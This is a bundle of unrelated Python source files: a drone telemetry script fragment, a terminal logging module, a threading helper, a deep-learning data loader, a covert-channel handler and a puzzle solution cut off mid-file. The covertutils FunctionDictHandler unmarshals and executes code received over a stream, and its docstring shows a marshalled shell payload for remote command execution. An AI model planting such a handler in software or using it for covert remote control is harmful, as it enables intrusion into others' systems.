check_and_set_param(p, 'SEND_ORIGIN', 0)
check_and_set_param(p, 'INIT_ALT', 1.0)
if need_reboot:
print('Parameters were changed. Rebooting, please wait...')
main_utils.reboot(connection)
main_utils.stop_sending_heartbeat(connection)
del connection
time.sleep(5)
connection = main_utils.connect()
main_utils.start_sending_heartbeat(connection)
connection.wait_heartbeat()
print('Got heartbeat.')
sys_time_msg = connection.recv_match(type='SYSTEM_TIME', blocking=True)
now_us = int(time.time() * 1e6)
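# The two offsets combine to (remote_boot - local_unix) in microseconds,
# so adding stamp_offset_ms to the local Unix clock (in ms) yields the
# autopilot's time-since-boot, as used in send_attitude().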
time_diff_us = sys_time_msg.time_unix_usec - now_us
boot_offset_us = sys_time_msg.time_boot_ms * 1000 - sys_time_msg.time_unix_usec
stamp_offset_ms = int((time_diff_us + boot_offset_us) / 1000)
print('Stamp offset is %d ms' % stamp_offset_ms)
attitude_thread = threading.Thread(target=send_attitude, daemon=True)
attitude_thread.start()
main_utils.send_command(
connection,
mavlink.MAV_CMD_SET_MESSAGE_INTERVAL,
param1=float(mavlink.MAVLINK_MSG_ID_GLOBAL_POSITION_INT),
param2=1e6
)
print('Press Ctrl-C to terminate receiving global position messages.')
try:
while True:
msg = connection.recv_match(type=['HEARTBEAT', 'GLOBAL_POSITION_INT', 'STATUSTEXT'], blocking=True)
if msg.get_type() == 'HEARTBEAT':
old_state = msg.system_status
if msg.system_status == mavlink.MAV_STATE_EMERGENCY:
print("*** NO COORDINATES ***")
elif msg.system_status == mavlink.MAV_STATE_CRITICAL:
print("*** ONLY ALTITUDE ***")
elif msg.system_status == mavlink.MAV_STATE_STANDBY:
print("*** FULL COORDINATES ***")
else:
print("*** UNEXPECTED SYSTEM STATUS (%d) ***" % msg.system_status)
elif msg.get_type() == 'GLOBAL_POSITION_INT':
print('Global Position message received (ms,lat,lon,alt,rel_alt,vx,vy,vz,hdg): %d, %.5f, %.5f, %.3f,'
' %.3f, %.3f, %.3f, %.3f, %3.3f' %
(msg.time_boot_ms, msg.lat, msg.lon, msg.alt, msg.relative_alt, msg.vx, msg.vy, msg.vz, msg.hdg)
)
elif msg.get_type() == 'STATUSTEXT':
main_utils.handle_statustext(connection, msg)
else:
print('Unexpected message %s' % msg.get_type())
except KeyboardInterrupt:
exit(0)
|
log.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import io
import logging
import os
import re
import sys
import threading
import time
from typing import List # noqa
LOG = logging.getLogger(__name__)
PERFORMANCE = 15
PROMPT = 50
SUCCESS = 60
stdout = io.StringIO(newline="")
class Color:
YELLOW = "\033[33m"
RED = "\033[31m"
class Format:
BOLD = "\033[1m"
CLEAR_LINE = "\x1b[0G\x1b[K"
CLEAR = "\033[0m"
TRUNCATE_OVERFLOW = "\033[?7l"
WRAP_OVERFLOW = "\033[?7h"
NEWLINE = "\n"
CURSOR_UP_LINE = "\x1b[1A"
HIDE_CURSOR = "\x1b[?25l"
SHOW_CURSOR = "\x1b[?25h"
class Character:
LAMBDA = "ƛ"
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__("%(asctime)s %(levelname)s %(message)s")
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD = 0.5
LINE_BREAKING_LEVELS = ["ERROR", "WARNING", "SUCCESS"]
_terminate = False # type: bool
_last_update = 0.0 # type: float
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator = ""
self.setLevel(logging.INFO)
self._record = None
self._last_record = None
self._active_lines = 0
# Preamble preparing terminal.
sys.stderr.write(
Format.NEWLINE
+ Format.TRUNCATE_OVERFLOW
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record, age=None) -> None:
self._last_record = record
suffix = ""
color = ""
active_lines = record.msg.count("\n") + 1
if record.levelname in self.LINE_BREAKING_LEVELS:
record.msg += "\n"
if record.levelname == "ERROR":
color = Color.RED
self._record = None
active_lines = 0
elif record.levelname == "WARNING":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "PROMPT":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
elif age:
if age > 10:
color = Color.YELLOW
if age > 30:
color = Color.RED
suffix = " {}[{:.1f}s]{}".format(
color if color else "", age, Format.CLEAR if color else ""
)
else:
self._record = record
self._last_update = time.time()
timed_record = copy.copy(record)
timed_record.msg = (
"{clear_line}{color} {cursor}{clear} " "{message}{suffix}"
).format(
clear_line=self.clear_lines(),
color=color,
cursor=Character.LAMBDA,
clear=Format.CLEAR,
message=record.msg,
suffix=suffix,
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
def _thread(self) -> None:
while not self._terminate:
if self._record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(self._record, age)
time.sleep(0.1)
def terminate(self) -> None:
last_record = self._last_record
if last_record and last_record.levelname not in self.LINE_BREAKING_LEVELS:
sys.stderr.write("\n")
# Reset terminal.
sys.stderr.write(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR)
sys.stderr.flush()
self._terminate = True
def initialize(arguments) -> None:
if arguments.noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
arguments.timed_stream_handler = None
else:
stream_handler = TimedStreamHandler()
arguments.timed_stream_handler = stream_handler
handlers = [stream_handler] # type: List[logging.Handler]
if not arguments.noninteractive:
try:
os.mkdir(".pyre")
except FileExistsError:
pass
file_handler = logging.FileHandler(".pyre/pyre.stderr")
file_handler.setFormatter(SectionFormatter())
file_handler.setLevel(logging.DEBUG)
# pyre-ignore[6]: T31515857
handlers.append(file_handler)
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=handlers)
def cleanup(arguments) -> None:
if arguments.timed_stream_handler:
arguments.timed_stream_handler.terminate()
output = stdout.getvalue()
if output:
sys.stdout.write(output + "\n")
class Buffer:
THRESHOLD = 0.1
_flushed = False # type: bool
def __init__(self, section, data) -> None:
self._section = section
self._data = data
self._lock = threading.RLock()
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def append(self, line) -> None:
self._data.append(line)
def flush(self) -> None:
with self._lock:
if self._flushed is True:
return
self._flushed = True
message = "\n".join(self._data)
if self._section == "ERROR":
LOG.error(message)
elif self._section == "INFO":
LOG.info(message)
elif self._section == "WARNING":
LOG.warning(message)
elif self._section == "PROGRESS":
LOG.info(message)
elif self._section == "PARSER":
LOG.error(message)
else:
LOG.debug("[%s] %s", self._section, message)
def _thread(self) -> None:
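# Auto-flush: if nothing has flushed this buffer within THRESHOLD
# seconds, flush it from this daemon thread.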
time.sleep(self.THRESHOLD)
with self._lock:
if not self._flushed:
self.flush()
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
|
multithreading.py
|
def new_thread(function, *args, **kwargs):
"""
launches the input 'function' in a separate thread with daemon == True.
Explanation: Some threads do background tasks, like sending keepalive packets, or performing periodic garbage collection, or whatever. These are only useful when the main program is running, and it's okay to kill them off once the other, non-daemon, threads have exited.
Without daemon threads, you'd have to keep track of them, and tell them to exit, before your program can completely quit. By setting them as daemon threads, you can let them run and forget about them, and when your program quits, any daemon threads are killed automatically.
@Chris Jester-Young https://stackoverflow.com/a/190017/8436767
Parameters
----------
function:
function object
*args:
iterable of arguments
**kwargs:
dictionary of keywords
daemon:
flag, if the thread is daemon(True) or not(False).
Returns
-------
thread:
thread object
Examples
--------
the example of usage
>>> def func(*args,**kwargs):
print('keywords',kwargs)
print('args',args)
from time import time,sleep
t1 = time()
sleep(args[0])
t2 = time()
print('this thread slept for {} seconds'.format(t2-t1))
print('input parameters: args = {}, kwargs = {!r}'.format(args[0],kwargs['keyword']))
>>> new_thread(func, 1, keyword = 'this is key 1 value')
this thread slept for 1.002244234085083 seconds
input parameters: args = 1, kwargs = 'this is key 1 value'
"""
from threading import Thread
# pop 'daemon' so it is treated as a thread option and not forwarded to the target function
daemon = kwargs.pop('daemon', True)
thread = Thread(target=function, args=args, kwargs=kwargs)
thread.daemon = daemon
thread.start()
return thread
def start_new_safe_thread(function, daemon = True, *args , **kwargs):
"""
alias for new_thread for back compatibility
"""
import warnings
warnings.warn(
"start_new_safe_thread will be deprecated in version 0.0.7, use new_thread instead",
PendingDeprecationWarning
)
return new_thread(function, *args, daemon=daemon, **kwargs)
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
from paddle.fluid.framework import _set_expected_place, _current_expected_place
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode
from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
from .batch_sampler import _InfiniteIterableSampler
from .collate import default_collate_fn, default_convert_fn
from .worker import ParentWatchDog, get_worker_info, _worker_loop, \
_DatasetKind, _IterableDatasetStopIteration, _WorkerException
from .flat import _flatten_batch, _restore_batch
__all__ = ['get_worker_info']
class _DataLoaderIterBase(object):
"""
Iterator implementation of DataLoader; loads and feeds mini-batch
data according to the settings of the given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._auto_collate_batch = loader.auto_collate_batch
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
if self._auto_collate_batch:
self._sampler_iter = iter(loader.batch_sampler)
self._collate_fn = loader.collate_fn or default_collate_fn
else:
if self._dataset_kind == _DatasetKind.MAP:
self._sampler_iter = iter(list(range(len(self._dataset))))
else:
self._sampler_iter = iter(
_InfiniteIterableSampler(self._dataset, 1))
self._collate_fn = loader.collate_fn or default_convert_fn
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data to self._blocking_queue, mini-batch data
# will be fetched from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single-process implementation of DataLoaderIter, loading data from
loader.data in the main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._auto_collate_batch,
self._collate_fn, True)
# NOTE: _structure_infos is used to record the data structure of
# each batch so that it can be restored after reading Tensors
# from blocking_queue in single-process mode. Note that
# since only a single process is used here, we
# can record the data structures sequentially in a list without
# recording the send and recv indices
self._structure_infos = []
# NOTE: len(self._places) batches compose one output
# iteration, so blocking_queue is set to cache at most
# 2 iterations of data here
self._blocking_queue_capacity = 2 * len(self._places)
self._init_thread()
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _thread_loop(self, legacy_expected_place):
try:
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
for indices in self._sampler_iter:
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices)
# flat batch and record structure infos
batch, structure = _flatten_batch(batch)
self._structure_infos.append(structure)
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except StopIteration:
self._blocking_queue.close()
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning("DataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def __next__(self):
try:
if in_dygraph_mode():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organizes multi-device data in a list; if the
# place number is 1, there is only 1 device, so extract the data
# from the per-device list to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
return data
except StopIteration:
self._reader.shutdown()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def __del__(self):
# _blocking_queue in keep-order mode holds sub-threads;
# we need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess workers' result queue
self._data_queue = None
# data fetched from _data_queue is reordered by _rcvd_idx to
# keep data order; data whose index does not equal _rcvd_idx
# is cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# _outstanding_capacity indices are put out at first, and the
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity here makes sure each indices_queue
# holds at least 2 sets of indices, and that outstanding batches
# cache output data for at least 2 iterations (note that
# len(_places) batches are composed into one iteration's output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
# multiprocess worker and indices queue lists are initially empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# events for workers and the reader thread; the thread event is
# only needed in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._auto_collate_batch, self._collate_fn,
self._worker_init_fn, i, self._num_workers,
self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _shutdown_worker(self, worker_id):
if self._worker_status[worker_id]:
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# _workers_done_event should be set before putting None
# into the indices_queues; workers will exit on reading None
# from their indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i)
for w in self._workers:
w.join()
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _thread_loop(self, legacy_expected_place):
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
else:
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# a LoDTensor not in shared memory is not
# serializable and cannot be created in workers
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
# For IterableDataset, batch indices are generated infinitely
# until each worker raises StopIteration, but a worker that
# raises StopIteration discards a set of batch indices counted
# in _send_idx without increasing _rcvd_idx, so we check
# whether the worker is still alive here to skip the discarded
# batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
sys.stdout.flush()
info = self._task_infos[self._rcvd_idx]
if len(info) == 3 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
# NOTE: _rcvd_idx and _send_idx only record batches among
# workers; even if the batches among workers are drained,
# there may still be data in the blocking queue
if self._batches_outstanding < len(self._places):
return None
continue
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 3:
info = self._task_infos.pop(self._rcvd_idx)
self._structure_infos.append(info[2])
return info[1]
try:
# [ avoid hang ]: the main process may block at _reader.read_next on
# KeyboardInterrupt, so we make the following tradeoff:
# 1. get data with a timeout, MP_STATUS_CHECK_INTERVAL (5s) by
# default; if blocked by KeyboardInterrupt, failed workers are
# checked and a RuntimeError is raised to quit the DataLoader in
# the timeout exception handling.
# 2. if getting data times out and all workers are still alive,
# continue to get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
# if a worker gets StopIteration, we shut this worker down;
# note that the batch indices that triggered StopIteration
# are discarded, so the outstanding batch number is decreased
# and another set of indices is put for the other workers
# that may still be working.
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch, structure = data
if isinstance(batch, _WorkerException):
self._exit_thread_unexpectedly()
batch.reraise()
if idx == self._rcvd_idx:
del self._task_infos[idx]
self._structure_infos.append(structure)
return batch
else:
self._task_infos[idx] += (batch, structure)
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
# In multi-process mode for IterableDataset, _try_put_indices will
# be called both in the main process (our implementation has a
# blocking queue whose reads happen in the main process) and in the
# reader thread, which may cause the following errors:
# 1. "ValueError: generator already executing" in next(self._sampler_iter)
# 2. re-entrant increments of _send_idx
# add a lock for thread safety; since _try_put_indices is only a
# lightweight function outside the data reading pipeline, this lock
# has almost no influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def __next__(self):
try:
# _batches_outstanding records the total number of batches between
# _try_put_indices and data output; this value should equal
# _outstanding_capacity while data is not drained. If
# _batches_outstanding is less than the number of _places, there is
# not enough data to generate the next output, so close blocking_queue
# and set _thread_done_event here; py_reader will raise StopIteration,
# ending workers and indices_queues in the StopIteration handling
if self._batches_outstanding < len(self._places):
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organizes multi-device data in a list; if the
# place number is 1, there is only 1 device, so extract the data
# from the per-device list to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
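# One output iteration consumes len(self._places) batches, so account
# for each of them and try to put new indices to keep workers busy.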
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
functiondict.py
|
# from abc import ABCMeta, abstractmethod
from covertutils.exceptions import *
from covertutils.handlers import BaseHandler
from covertutils.helpers import defaultArgMerging
import marshal, types
from threading import Thread
# from multiprocessing import Queue
try:
from queue import Queue # Python 3
except ImportError:
from Queue import Queue # Python 2
class FunctionDictHandler( BaseHandler ) :
"""
This class provides a per-stream function dict.
If a message is received from a `stream`, the function corresponding to that stream will be executed with the received message as its single argument.
The function's return value will be sent across that stream to the message's sender.
Ideal for a simple `remote shell` implementation.
The FunctionDictHandler class implements the `onMessage()` function of the BaseHandler class.
The `function_dict` passed to this class `__init__()` must have the following format:
.. code:: python
def os_echo( message ) :
from os import popen
resp = popen( "echo %s" % 'message' ).read()
return resp
function_dict = { 'echo' : os_echo }
Note: The functions must be **absolutely self contained**. In the above example the `popen()` function is imported inside the `os_echo`. This is to ensure that `popen()` will be available, as there is no way to tell if it will be imported from the handler's environment.
Well defined functions for that purpose can be found in :mod:`covertutils.payloads`. Also usable for the :class:`StageableHandler` class
.. code:: python
from covertutils.payloads import GenericStages
pprint( GenericStages )
{'shell': {'function': <function __system_shell at 0x7fc347472320>,
'marshal': 'c\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x02\\x00\\x00\\x00C\\x00\\x00\\x00s&\\x00\\x00\\x00d\\x01\\x00d\\x02\\x00l\\x00\\x00m\\x01\\x00}\\x01\\x00\\x01|\\x01\\x00|\\x00\\x00\\x83\\x01\\x00j\\x02\\x00\\x83\\x00\\x00}\\x02\\x00|\\x02\\x00S(\\x03\\x00\\x00\\x00Ni\\xff\\xff\\xff\\xff(\\x01\\x00\\x00\\x00t\\x05\\x00\\x00\\x00popen(\\x03\\x00\\x00\\x00t\\x02\\x00\\x00\\x00osR\\x00\\x00\\x00\\x00t\\x04\\x00\\x00\\x00read(\\x03\\x00\\x00\\x00t\\x07\\x00\\x00\\x00messageR\\x00\\x00\\x00\\x00t\\x06\\x00\\x00\\x00result(\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00s\\x15\\x00\\x00\\x00covertutils/Stages.pyt\\x0e\\x00\\x00\\x00__system_shell\\x04\\x00\\x00\\x00s\\x06\\x00\\x00\\x00\\x00\\x01\\x10\\x01\\x12\\x01'}}
"""
# __metaclass__ = ABCMeta
def __init__( self, recv, send, orchestrator, **kw ) :
"""
:param dict function_dict: A dict containing `(stream_name, function)` tuples. Every time a message is received from `stream_name`, `function(message)` will be automatically executed.
"""
super( FunctionDictHandler, self ).__init__( recv, send, orchestrator, **kw )
self.stage_storage = {}
self.stage_storage['COMMON'] = {}
self.stage_storage['COMMON']['handler'] = self
self.processed_responses = Queue()
# try :
# self.function_dict = kw['function_dict']
for stream, stage in list(kw['function_dict'].items()) :
self.addStage( stream, stage )
# except :
# raise NoFunctionAvailableException( "No Function dict provided to constructor" )
def onMessage( self, stream, message ) :
"""
:raises: :exc:`NoFunctionAvailableException`
"""
super( FunctionDictHandler, self ).onMessage( stream, message )
# print message
self.stage_storage[stream]['queue'].put( message )
# print "Put to Queue"
ret = self.processed_responses.get(True)
# print "Processed: "+ret
return ret
def onChunk( self, stream, message ) : pass
def onNotRecognised( self ) : pass
def stageWorker( self, init, worker, storage ) :
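# Per-stream worker loop, run in a daemon thread: run init(storage) once,
# then feed every queued message to worker() and push its return value
# onto processed_responses for onMessage() to pick up.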
# print "Handler: Worker Started"
if not init(storage) : return
# print "Handler: Init Run Started"
while storage['on'] :
# print "Try to GET from Queue"
message = storage['queue'].get( block = True )
# print "Handler: Work() Run"
ret = worker(storage, message)
# print ret, type(ret)
self.processed_responses.put( ret )
self.stage_storage[storage['stream']] = {}  # reset this stream's storage once the worker loop ends
def getStage( self, stage_obj ) :
# Recognize the type of stage
# Assume 'marshal' for now
stage_dict = marshal.loads( stage_obj )
# print stage_dict
# print stage_dict['init']
if stage_dict['init'] is None :
stage_init = _dummy_init
else :
stage_init = types.FunctionType(stage_dict['init'], globals(), "stage_init_func")
stage_work = types.FunctionType(stage_dict['work'], globals(), "stage_work_func")
# print stage_init
return stage_init, stage_work
def addStage( self, stream, stage_obj ) :
self.stage_storage[stream] = {}
self.stage_storage[stream]['queue'] = Queue()
self.stage_storage[stream]['on'] = True
self.stage_storage[stream]['stream'] = stream
self.stage_storage[stream]['COMMON'] = self.stage_storage['COMMON']
# print stream
stage_init, stage_worker = self.getStage( stage_obj )
self.orchestrator.addStream( stream )
stage_thread = Thread( target = self.stageWorker, args = ( stage_init, stage_worker, self.stage_storage[stream] ) )
stage_thread.daemon = True
stage_thread.start()
pass
def _dummy_init (storage) :
return True
|
solution.py
|
import threading
from typing import List, Tuple
from solutions.helpers import IntCodeApplication
def part_one(data: List[int]) -> int:
"""Test the Emergency Hull Painting Robot by running its application."""
canvas = {}
application = IntCodeApplication(
application=data,
name="Painting App",
flexible_memory=True,
)
pipe_in = application.stdin
pipe_out = application.stdout
robot = threading.Thread(target=application.run)
robot.start()
location = complex(0, 0)
direction = complex(0, 1)
while robot.is_alive():
pipe_in.put(canvas.get(location, 0))
canvas[location] = pipe_out.get()
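# Second output selects the turn: 0 -> multiply by i (turn left),
# 1 -> multiply by -i (turn right); then step one panel forward.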
direction *= complex(0, 1 - 2*pipe_out.get())
location += direction
return len(canvas)
def part_two(data: List[int]) -> str:
